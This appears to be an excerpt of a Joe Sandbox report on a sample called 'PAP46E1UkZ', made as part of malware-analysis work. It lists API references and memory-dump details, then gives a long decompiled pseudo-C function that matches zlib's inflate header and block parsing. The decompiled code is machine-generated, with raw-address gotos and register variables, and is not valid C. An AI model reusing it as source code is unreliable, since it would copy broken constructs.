                                                                                                                                                                                                                              0x7ff735c6436b
                                                                                                                                                                                                                              0x7ff735c64370
                                                                                                                                                                                                                              0x7ff735c64375
                                                                                                                                                                                                                              0x7ff735c64387
                                                                                                                                                                                                                              0x7ff735c6438c
                                                                                                                                                                                                                              0x7ff735c643a0
                                                                                                                                                                                                                              0x7ff735c643ab
                                                                                                                                                                                                                              0x7ff735c643b0
                                                                                                                                                                                                                              0x7ff735c643b5
                                                                                                                                                                                                                              0x7ff735c643ba
                                                                                                                                                                                                                              0x7ff735c643bf
                                                                                                                                                                                                                              0x7ff735c643c4
                                                                                                                                                                                                                              0x7ff735c643d2

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF735C6428E
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C639E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF735C639F8
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF735C6429F
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C63984: _invalid_parameter_noinfo.LIBCMT ref: 00007FF735C63998
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF735C642B0
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C639B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF735C639C8
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C59468: RtlReleasePrivilege.NTDLL(?,?,?,00007FF735C6138E,?,?,?,00007FF735C613CB,?,?,00000000,00007FF735C6189C,?,?,?,00007FF735C617CF), ref: 00007FF735C5947E
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C59468: GetLastError.KERNEL32(?,?,?,00007FF735C6138E,?,?,?,00007FF735C613CB,?,?,00000000,00007FF735C6189C,?,?,?,00007FF735C617CF), ref: 00007FF735C59488
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF735C644F0), ref: 00007FF735C642D7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLastPrivilegeReleaseTimeZone
                                                                                                                                                                                                                              • String ID: Pacific Daylight Time$Pacific Standard Time
                                                                                                                                                                                                                              • API String ID: 1182710636-1154798116
                                                                                                                                                                                                                              • Opcode ID: b76b1055997d04befc65f7cc1c066b2050fb1d1f19f6fb1f5551e22f79166632
                                                                                                                                                                                                                              • Instruction ID: d667988e5ff92a390d20514127b4c627e187f4aee1ebbd790dda8889f4c19d5e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b76b1055997d04befc65f7cc1c066b2050fb1d1f19f6fb1f5551e22f79166632
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96514B63A08643A6E710FF21D8815B9F761FB48F8CF845235EA5D43696DF3CE500AB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C47864 Relevance: 5.4, Strings: 4, Instructions: 399COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                                                                              			E00007FF77FF735C47864(signed int __ebx, void* __edi, void* __ebp, signed char* __rsi, signed long long __r8, void* __r9, void* __r11, signed long long __r12, void* __r13, void* __r14, long long __r15) {
				signed int _t532;
				signed int _t542;
				signed int _t543;
				intOrPtr _t554;
				void* _t555;
				signed int _t575;
				signed int _t578;
				unsigned int _t580;
				unsigned int _t584;
				signed int _t600;
				signed int _t602;
				signed int _t609;
				signed char _t614;
				signed int _t627;
				signed char _t632;
				unsigned int _t639;
				void* _t640;
				signed int _t649;
				signed int _t663;
				signed int _t672;
				signed int _t674;
				signed int _t676;
				signed int _t678;
				signed int _t680;
				signed int _t682;
				signed int _t683;
				void* _t684;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t691;
				void* _t692;
				signed int _t693;
				void* _t694;
				signed int _t695;
				void* _t696;
				signed int _t697;
				void* _t698;
				signed int _t700;
				signed int _t701;
				void* _t702;
				signed int _t704;
				signed int _t705;
				void* _t706;
				signed int _t708;
				void* _t709;
				signed int _t710;
				signed int _t711;
				void* _t712;
				signed int _t714;
				void* _t715;
				signed int _t716;
				signed int _t718;
				signed int _t719;
				signed int _t723;
				signed char _t735;
				signed char _t753;
				signed char _t756;
				signed int _t758;
				signed char _t759;
				signed int _t763;
				signed char _t780;
				signed char _t784;
				signed char _t814;
				signed char _t817;
				signed char _t823;
				signed char _t847;
				signed char _t850;
				signed char _t856;
				void* _t858;
				intOrPtr _t859;
				void* _t863;
				signed int _t874;
				signed int _t890;
				signed char _t895;
				void* _t897;
				void* _t901;
				void* _t905;
				signed char _t917;
				signed char _t922;
				intOrPtr _t924;
				void* _t926;
				void* _t927;
				void* _t928;
				signed char _t929;
				void* _t930;
				void* _t931;
				void* _t932;
				void* _t933;
				void* _t934;
				intOrPtr _t935;
				void* _t936;
				void* _t937;
				void* _t938;
				void* _t939;
				void* _t940;
				void* _t941;
				void* _t942;
				intOrPtr _t943;
				intOrPtr _t944;
				void* _t945;
				void* _t946;
				void* _t947;
				void* _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t953;
				unsigned int _t955;
				signed int _t956;
				unsigned int _t957;
				signed int _t959;
				unsigned int _t960;
				signed char _t962;
				signed int _t966;
				signed int _t971;
				unsigned int _t972;
				unsigned int _t975;
				unsigned int _t976;
				signed int _t978;
				signed int _t979;
				signed int _t980;
				signed int _t981;
				unsigned int _t982;
				unsigned int _t984;
				unsigned int _t989;
				unsigned int _t992;
				unsigned int _t995;
				signed int _t998;
				unsigned int _t999;
				unsigned int _t1002;
				signed int _t1004;
				unsigned int _t1005;
				signed int _t1008;
				unsigned int _t1009;
				signed int _t1011;
				unsigned int _t1012;
				signed int* _t1019;
				intOrPtr _t1040;
				intOrPtr _t1069;
				void* _t1085;
				void* _t1120;
				void* _t1132;
				intOrPtr _t1207;
				intOrPtr _t1209;
				intOrPtr _t1210;
				intOrPtr _t1211;
				intOrPtr _t1212;
				intOrPtr _t1213;
				intOrPtr _t1214;
				intOrPtr _t1216;
				signed long long _t1221;
				long long _t1222;
				signed long long _t1225;
				signed long long _t1226;
				long long _t1229;
				signed long long _t1233;
				signed long long _t1235;
				signed long long _t1238;
				void* _t1241;
				intOrPtr _t1243;
				void* _t1244;
				signed long long _t1248;
				signed long long _t1249;
				signed long long _t1250;
				signed long long _t1252;
				signed long long _t1253;
				signed long long _t1254;
				signed int* _t1255;
				intOrPtr _t1260;
				intOrPtr _t1263;
				intOrPtr _t1265;
				signed char* _t1266;
				signed char* _t1283;
				signed char* _t1284;
				signed char* _t1285;
				signed char* _t1286;
				signed char* _t1287;
				signed char* _t1288;
				signed char* _t1289;
				signed char* _t1290;
				signed char* _t1291;
				signed char* _t1292;
				signed char* _t1294;
				signed char* _t1295;
				signed char* _t1296;
				signed char* _t1297;
				signed char* _t1298;
				signed char* _t1299;
				signed char* _t1301;
				signed char* _t1302;
				signed char* _t1303;
				signed char* _t1304;
				signed char* _t1305;
				signed char* _t1306;
				signed char* _t1307;
				signed char* _t1308;
				void* _t1311;
				void* _t1313;
				signed long long _t1315;
				intOrPtr _t1317;
				char* _t1324;
				char* _t1325;
				long long _t1326;
				intOrPtr _t1327;
				intOrPtr _t1328;
				intOrPtr _t1329;
				intOrPtr _t1330;
				void* _t1331;
				signed long long _t1332;
				long long _t1339;

				_t1332 = __r12;
				_t1331 = __r11;
				_t1315 = __r8;
				if (__ebx - 0x10 >= 0) goto 0x35c4788e;
				if (__edi == 0) goto 0x35c47eff;
				_t926 = __edi - 1;
				_t955 = __ebp + (( *__rsi & 0x000000ff) << __ebx);
				_t1283 =  &(__rsi[1]);
				if (__ebx + 8 - 0x10 < 0) goto 0x35c47870;
				 *(__r13 + 0x18) = _t955;
				if (bpl == 8) goto 0x35c478b1;
				 *(__r12 + 0x20) = "unknown compression method";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d61;
				if ((_t955 & 0x0000e000) == 0) goto 0x35c478d2;
				 *(__r12 + 0x20) = "unknown header flags set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d61;
				_t1255 =  *((intOrPtr*)(__r13 + 0x28));
				_t723 = _t955 >> 8;
				_t1019 = _t1255;
				if (_t1019 == 0) goto 0x35c478ed;
				 *_t1255 = _t723 & 0x00000001;
				asm("bt eax, 0x9");
				if (_t1019 >= 0) goto 0x35c4791b;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c4791b;
				 *(_t1313 + 0x30) = bpl;
				 *(_t1313 + 0x31) = _t723;
				r8d = 2;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1313 + 0x30);
				_t956 = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f36;
				_t672 = r15d;
				if (_t672 - 0x20 >= 0) goto 0x35c4794e;
				if (_t926 == 0) goto 0x35c47eff;
				_t927 = _t926 - 1;
				_t957 = _t956 + (( *_t1283 & 0x000000ff) << _t672);
				_t1284 =  &(_t1283[1]);
				if (_t672 + 8 - 0x20 < 0) goto 0x35c47930;
				_t1207 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1207 == 0) goto 0x35c4795a;
				 *(_t1207 + 4) = _t957;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x35c479a2;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c479a2;
				 *(_t1313 + 0x30) = bpl;
				 *(_t1313 + 0x31) = _t957 >> 8;
				r8d = 4;
				 *((char*)(_t1313 + 0x32)) = _t957 >> 0x10;
				 *(_t1313 + 0x33) = bpl;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1313 + 0x30);
				_t959 = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f37;
				_t674 = r15d;
				if (_t674 - 0x10 >= 0) goto 0x35c479d5;
				if (_t927 == 0) goto 0x35c47eff;
				_t928 = _t927 - 1;
				_t960 = _t959 + (( *_t1284 & 0x000000ff) << _t674);
				_t1285 =  &(_t1284[1]);
				if (_t674 + 8 - 0x10 < 0) goto 0x35c479b7;
				_t1243 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1243 == 0) goto 0x35c479f3;
				 *(_t1243 + 8) = bpl & 0xffffffff;
				 *( *((intOrPtr*)(__r13 + 0x28)) + 0xc) = _t960 >> 8;
				goto 0x35c479f8;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x35c47a2a;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47a2a;
				 *(_t1313 + 0x30) = bpl;
				 *(_t1313 + 0x31) = _t960 >> 8;
				r8d = 2;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1313 + 0x30);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f38;
				_t676 = r15d;
				if (( *(__r13 + 0x18) & 0x00000400) == 0) goto 0x35c47ab3;
				if (_t676 - 0x10 >= 0) goto 0x35c47a65;
				if (_t928 == 0) goto 0x35c47eff;
				_t929 = _t928 - 1;
				_t962 = r15d + (( *_t1285 & 0x000000ff) << _t676);
				_t1286 =  &(_t1285[1]);
				if (_t676 + 8 - 0x10 < 0) goto 0x35c47a47;
				_t1209 =  *((intOrPtr*)(__r13 + 0x28));
				 *(__r13 + 0x50) = _t962;
				if (_t1209 == 0) goto 0x35c47a75;
				 *(_t1209 + 0x18) = _t962;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x35c47aab;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47aab;
				 *(_t1313 + 0x30) = bpl;
				r8d = 2;
				 *(_t1313 + 0x31) = bpl;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1313 + 0x30);
				_t678 = r15d;
				goto 0x35c47ac0;
				_t1210 =  *((intOrPtr*)(__r13 + 0x28));
				_t1040 = _t1210;
				if (_t1040 == 0) goto 0x35c47ac0;
				 *((long long*)(_t1210 + 0x10)) = __r15;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f39;
				asm("bt eax, 0xa");
				if (_t1040 >= 0) goto 0x35c47b66;
				_t735 =  *(__r13 + 0x50);
				r14d = _t929;
				r14d =  <=  ? _t735 : r14d;
				if (r14d == 0) goto 0x35c47b5e;
				_t1260 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1260 == 0) goto 0x35c47b2d;
				_t1327 =  *((intOrPtr*)(_t1260 + 0x10));
				if (_t1327 == 0) goto 0x35c47b2d;
				r8d =  *(_t1260 + 0x1c);
				r9d =  *(_t1260 + 0x18);
				r9d = r9d - _t735;
				_t519 =  >  ? r8d - r9d : r14d;
				_t1244 = _t1243 + _t1327;
				r8d =  >  ? r8d - r9d : r14d;
				E00007FF77FF735C4B150();
				asm("bt eax, 0x9");
				if (__r14 + __r9 - r8d >= 0) goto 0x35c47b4d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47b4d;
				r8d = r14d;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1286);
				_t930 = _t929 - r14d;
				_t1287 =  &(_t1286[_t1210]);
				 *(__r13 + 0x50) =  *(__r13 + 0x50) - r14d;
				if ( *(__r13 + 0x50) != 0) goto 0x35c47eff;
				 *(__r13 + 0x50) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3a;
				if (( *(__r13 + 0x18) & 0x00000800) == 0) goto 0x35c47c03;
				if (_t930 == 0) goto 0x35c47eff;
				r14d = r15d;
				r14d = r14d + 1;
				r15d =  *(_t1210 + _t1287) & 0x000000ff;
				_t1211 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1211 == 0) goto 0x35c47bbe;
				_t1263 =  *((intOrPtr*)(_t1211 + 0x20));
				if (_t1263 == 0) goto 0x35c47bbe;
				if ( *(__r13 + 0x50) -  *((intOrPtr*)(_t1211 + 0x28)) >= 0) goto 0x35c47bbe;
				 *((intOrPtr*)(_t1244 + _t1263)) = r15b;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + 1;
				if (r15b == 0) goto 0x35c47bc8;
				if (r14d - _t930 < 0) goto 0x35c47b90;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x35c47bec;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47bec;
				r8d = r14d;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1287);
				_t931 = _t930 - r14d;
				_t1288 =  &(_t1287[_t1211]);
				if (r15b != 0) goto 0x35c47eff;
				r15d = 0;
				goto 0x35c47c10;
				_t1212 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1212 == 0) goto 0x35c47c10;
				 *((long long*)(_t1212 + 0x20)) = __r15;
				 *(__r13 + 0x50) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3b;
				if (( *(__r13 + 0x18) & 0x00001000) == 0) goto 0x35c47ca4;
				if (_t931 == 0) goto 0x35c47eff;
				r14d = r15d;
				r14d = r14d + 1;
				r15d =  *(_t1212 + _t1288) & 0x000000ff;
				_t1213 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1213 == 0) goto 0x35c47c5f;
				_t1265 =  *((intOrPtr*)(_t1213 + 0x30));
				if (_t1265 == 0) goto 0x35c47c5f;
				if ( *(__r13 + 0x50) -  *((intOrPtr*)(_t1213 + 0x38)) >= 0) goto 0x35c47c5f;
				 *((intOrPtr*)(_t1244 + _t1265)) = r15b;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + 1;
				if (r15b == 0) goto 0x35c47c69;
				if (r14d - _t931 < 0) goto 0x35c47c31;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x35c47c8d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47c8d;
				r8d = r14d;
				_t1266 = _t1288;
				 *(__r13 + 0x20) = E00007FF77FF735C49520(_t1266);
				_t932 = _t931 - r14d;
				_t1289 =  &(_t1288[_t1213]);
				if (r15b != 0) goto 0x35c47eff;
				r15d = 0;
				goto 0x35c47cb1;
				_t1214 =  *((intOrPtr*)(__r13 + 0x28));
				_t1069 = _t1214;
				if (_t1069 == 0) goto 0x35c47cb1;
				 *((long long*)(_t1214 + 0x30)) = __r15;
				r10d =  *(_t1313 + 0xb8);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3c;
				asm("bt edx, 0x9");
				if (_t1069 >= 0) goto 0x35c47d1a;
				if (_t678 - 0x10 >= 0) goto 0x35c47cee;
				if (_t932 == 0) goto 0x35c47eff;
				_t933 = _t932 - 1;
				_t1290 =  &(_t1289[1]);
				if (_t678 + 8 - 0x10 < 0) goto 0x35c47cd0;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x35c47d14;
				if (r15d + (( *_t1289 & 0x000000ff) << _t678) == ( *(__r13 + 0x20) & 0x0000ffff)) goto 0x35c47d14;
				 *(__r12 + 0x20) = "header crc mismatch";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d5c;
				_t966 = r15d;
				_t680 = r15d;
				_t1216 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1216 == 0) goto 0x35c47d37;
				 *(_t1216 + 0x3c) =  *(__r13 + 0x18) >> 0x00000009 & 0x00000001;
				_t1217 =  *((intOrPtr*)(__r13 + 0x28));
				 *( *((intOrPtr*)(__r13 + 0x28)) + 0x40) = 1;
				r8d = 0;
				_t532 = E00007FF77FF735C49520(_t1266);
				 *(__r13 + 0x20) = _t532;
				 *(__r12 + 0x4c) = _t532;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3f;
				r10d =  *(_t1313 + 0xb8);
				_t1317 =  *((intOrPtr*)(_t1313 + 0x40));
				_t152 = _t1266 - 0x3f34; // 0x14
				if (_t152 - 0x1f > 0) goto 0x35c48d65;
				r8d =  *(_t1313 + 0xa0);
				r15d = 0;
				r14d =  *(_t1313 + 0xa8);
				if (_t680 - 0x20 >= 0) goto 0x35c47daf;
				if (_t933 == 0) goto 0x35c47eff;
				_t934 = _t933 - 1;
				_t967 = _t966 + (( *_t1290 & 0x000000ff) << _t680);
				_t1291 =  &(_t1290[1]);
				if (_t680 + 8 - 0x20 < 0) goto 0x35c47d91;
				_t682 = r15d;
				_t542 = (_t966 + (( *_t1290 & 0x000000ff) << _t680) >> 0x00000008 & 0x0000ff00) + ((_t966 + (( *_t1290 & 0x000000ff) << _t680) & 0x0000ff00) + (_t967 << 0x10) << 8) + (_t967 >> 0x18);
				 *(__r13 + 0x20) = _t542;
				 *(__r12 + 0x4c) = _t542;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3e;
				if ( *((intOrPtr*)(__r13 + 0x14)) == 0) goto 0x35c48c20;
				r8d = 0;
				_t543 = E00007FF77FF735C49230(0, _t1217, _t1266, __r8, _t1317);
				r10d =  *(_t1313 + 0xb8);
				 *(__r13 + 0x20) = _t543;
				 *(__r12 + 0x4c) = _t543;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3f;
				if (__r14 - 5 - 1 <= 0) goto 0x35c47eff;
				if ( *(__r13 + 0xc) == 0) goto 0x35c47e43;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4e;
				_t753 = _t682 & 0x00000007;
				_t683 = _t682 - _t753;
				goto 0x35c47d5c;
				if (_t683 - 3 >= 0) goto 0x35c47e66;
				if (_t934 == 0) goto 0x35c47eff;
				_t935 = _t934 - 1;
				_t971 = (r15d >> _t753) + (( *_t1291 & 0x000000ff) << _t683);
				_t1292 =  &(_t1291[1]);
				_t684 = _t683 + 8;
				_t1085 = _t684 - 3;
				if (_t1085 < 0) goto 0x35c47e48;
				_t972 = _t971 >> 1;
				 *(__r13 + 0xc) = _t971 & 0x00000001;
				if (_t1085 == 0) goto 0x35c47f9d;
				if (_t1085 == 0) goto 0x35c47ec1;
				if (_t1085 == 0) goto 0x35c47eae;
				if ((_t972 & 0x00000003) != 1) goto 0x35c47fa5;
				 *(__r12 + 0x20) = "invalid block type";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d5c;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f44;
				goto 0x35c47d5c;
				 *(__r13 + 0x70) = 9;
				 *((long long*)(__r13 + 0x60)) = 0x35c6bcb0;
				 *((long long*)(__r13 + 0x68)) = 0x35c6c4b0;
				 *((intOrPtr*)(__r13 + 0x74)) = 5;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f47;
				if (r14d != 6) goto 0x35c47fa5;
				_t975 = _t972 >> 2 >> 2 >> 2;
				_t687 = _t684 + 0x2fffffff7;
				r14d =  *(_t1313 + 0xa0);
				r15d =  *(_t1313 + 0xb0);
				 *((long long*)(__r12 + 0x10)) =  *((intOrPtr*)(_t1313 + 0x40));
				 *(__r12 + 0x18) =  *(_t1313 + 0xb8);
				 *__r12 = _t1292;
				 *((intOrPtr*)(__r12 + 8)) = _t935;
				 *(__r13 + 0x48) = _t975;
				 *(__r13 + 0x4c) = _t687;
				if ( *((intOrPtr*)(__r13 + 0x34)) != 0) goto 0x35c47f6e;
				if (r14d ==  *(__r12 + 0x18)) goto 0x35c48c91;
				_t554 =  *((intOrPtr*)(__r13 + 8));
				if (_t554 - 0x3f51 >= 0) goto 0x35c48c91;
				if (_t554 - 0x3f4e < 0) goto 0x35c47f6e;
				if ( *(_t1313 + 0xa8) == 4) goto 0x35c48c91;
				r8d = r14d;
				r8d = r8d -  *(__r12 + 0x18);
				_t555 = E00007FF77FF735C49120(0x35c6c4b0, _t1241, __r12,  *((intOrPtr*)(__r12 + 0x10)), _t1311); // executed
				if (_t555 == 0) goto 0x35c48c91;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f52;
				goto 0x35c48d6a;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f41;
				_t976 = _t975 >> 2;
				_t688 = _t687 + 0xfffffffd;
				_t756 = _t688 & 0x00000007;
				_t689 = _t688 - _t756;
				if (_t689 - 0x20 >= 0) goto 0x35c47fde;
				if (_t935 == 0) goto 0x35c47eff;
				_t936 = _t935 - 1;
				_t978 = (_t976 >> _t756) + (( *_t1292 & 0x000000ff) << _t689);
				if (_t689 + 8 - 0x20 < 0) goto 0x35c47fc0;
				_t758 = _t978 & 0x0000ffff;
				if (_t758 ==  !_t978 >> 0x10) goto 0x35c48005;
				_t1221 = "invalid stored block lengths";
				 *(__r12 + 0x20) = _t1221;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d61;
				 *(__r13 + 0x50) = _t758;
				_t979 = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f42;
				_t691 = r15d;
				if (r14d == 6) goto 0x35c47eff;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f43;
				_t759 =  *(__r13 + 0x50);
				if (_t759 == 0) goto 0x35c4808b;
				r14d = r10d;
				_t563 =  <=  ? _t759 : _t936;
				r14d =  <=  ?  <=  ? _t759 : _t936 : r14d;
				if (r14d == 0) goto 0x35c47eff;
				r8d = r14d;
				E00007FF77FF735C4B150();
				r10d =  *(_t1313 + 0xb8);
				_t937 = _t936 - r14d;
				r10d = r10d - r14d;
				 *(_t1313 + 0xb8) = r10d;
				_t1294 =  &(( &(_t1292[1]))[_t1221]);
				 *((long long*)(_t1313 + 0x40)) =  *((intOrPtr*)(_t1313 + 0x40)) + _t1221;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) - r14d;
				goto 0x35c47d61;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3f;
				if (_t691 - 0xe >= 0) goto 0x35c480be;
				if (_t937 == 0) goto 0x35c47eff;
				_t938 = _t937 - 1;
				_t980 = _t979 + (( *_t1294 & 0x000000ff) << _t691);
				_t1295 =  &(_t1294[1]);
				_t692 = _t691 + 8;
				if (_t692 - 0xe < 0) goto 0x35c480a0;
				_t693 = _t692 + 0xfffffff2;
				_t981 = _t980 >> 5;
				_t763 = (_t980 & 0x0000001f) + 0x101;
				_t982 = _t981 >> 5;
				 *(__r13 + 0x7c) = _t763;
				_t890 = (_t981 & 0x0000001f) + 1;
				 *(__r13 + 0x80) = _t890;
				 *((intOrPtr*)(__r13 + 0x78)) = (_t982 & 0x0000000f) + 4;
				if (_t763 - 0x11e > 0) goto 0x35c48220;
				if (_t890 - 0x1e > 0) goto 0x35c48220;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f45;
				if ( *(__r13 + 0x84) -  *((intOrPtr*)(__r13 + 0x78)) >= 0) goto 0x35c48188;
				if (_t693 - 3 >= 0) goto 0x35c4814e;
				if (_t938 == 0) goto 0x35c47eff;
				_t939 = _t938 - 1;
				_t984 = (_t982 >> 4) + (( *_t1295 & 0x000000ff) << _t693);
				_t1296 =  &(_t1295[1]);
				_t694 = _t693 + 8;
				if (_t694 - 3 < 0) goto 0x35c48130;
				_t695 = _t694 + 0xfffffffd;
				 *(__r13 + 0x90 + _t1221 * 2) = _t984 & 7;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				_t575 =  *(__r13 + 0x84);
				if (_t575 -  *((intOrPtr*)(__r13 + 0x78)) < 0) goto 0x35c48124;
				if (_t575 - 0x13 >= 0) goto 0x35c481ba;
				 *(__r13 + 0x90 + _t1221 * 2) = r15w;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				if ( *(__r13 + 0x84) - 0x13 < 0) goto 0x35c48190;
				_t1248 = __r13 + 0x70;
				_t1222 = __r13 + 0x550;
				 *_t1248 = 7;
				 *((long long*)(__r13 + 0x60)) = _t1222;
				 *((long long*)(__r13 + 0x88)) = _t1222;
				 *((long long*)(_t1313 + 0x28)) = __r13 + 0x310;
				 *(_t1313 + 0x20) = _t1248;
				_t241 = _t1248 + 0x13; // 0x13
				r8d = _t241;
				_t578 = E00007FF77FF735C49860(0, __r13 + 0x90, _t1311, __r13 + 0x88, __r12);
				 *(_t1313 + 0xb0) = _t578;
				if (_t578 == 0) goto 0x35c48239;
				 *(_t1332 + 0x20) = "invalid code lengths set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				_t1225 = "too many length or distance symbols";
				 *(_t1332 + 0x20) = _t1225;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d61;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f46;
				r10d =  *(__r13 + 0x7c);
				if ( *(__r13 + 0x84) -  *(__r13 + 0x80) + r10d >= 0) goto 0x35c48462;
				r9d = 1;
				_t1328 =  *((intOrPtr*)(__r13 + 0x60));
				r9d = r9d <<  *(__r13 + 0x70);
				r9d = r9d - 1;
				_t1249 = _t1248 & _t1225;
				_t580 =  *(_t1328 + _t1249 * 4);
				r8d = _t580;
				r8d = r8d >> 0x10;
				 *(_t1313 + 0x34) = _t580;
				if ((_t580 >> 0x00000008 & 0x000000ff) - _t695 <= 0) goto 0x35c482e3;
				if (_t939 == 0) goto 0x35c47eff;
				_t940 = _t939 - 1;
				_t1297 =  &(_t1296[1]);
				_t696 = _t695 + 8;
				_t1226 = _t1225 & _t1249;
				_t584 =  *(_t1328 + _t1226 * 4);
				_t895 = _t584 >> 8;
				r8d = _t584;
				r8d = r8d >> 0x10;
				 *(_t1313 + 0x34) = _t584;
				if ((_t895 & 0x000000ff) - _t696 > 0) goto 0x35c482a7;
				_t1120 = r8w - 0x10;
				if (_t1120 >= 0) goto 0x35c4831a;
				_t697 = _t696 - (_t895 & 0x000000ff);
				 *((short*)(__r13 + 0x90 + _t1249 * 2)) = _t584 >> 0x10;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				r8d =  *(__r13 + 0x84);
				goto 0x35c48447;
				if (_t1120 != 0) goto 0x35c48379;
				_t897 = (_t895 & 0x000000ff) + 2;
				if (_t697 - _t897 >= 0) goto 0x35c48343;
				if (_t940 == 0) goto 0x35c47eff;
				_t941 = _t940 - 1;
				_t1298 =  &(_t1297[1]);
				_t698 = _t697 + 8;
				if (_t698 - _t897 < 0) goto 0x35c48326;
				_t780 =  *(_t1313 + 0x35) & 0x000000ff;
				_t989 = ((_t984 >> 3) + (( *_t1296 & 0x000000ff) << _t695) >> (_t895 & 0x000000ff)) + (( *_t1297 & 0x000000ff) << _t697) >> _t780;
				if ( *(__r13 + 0x84) == 0) goto 0x35c48492;
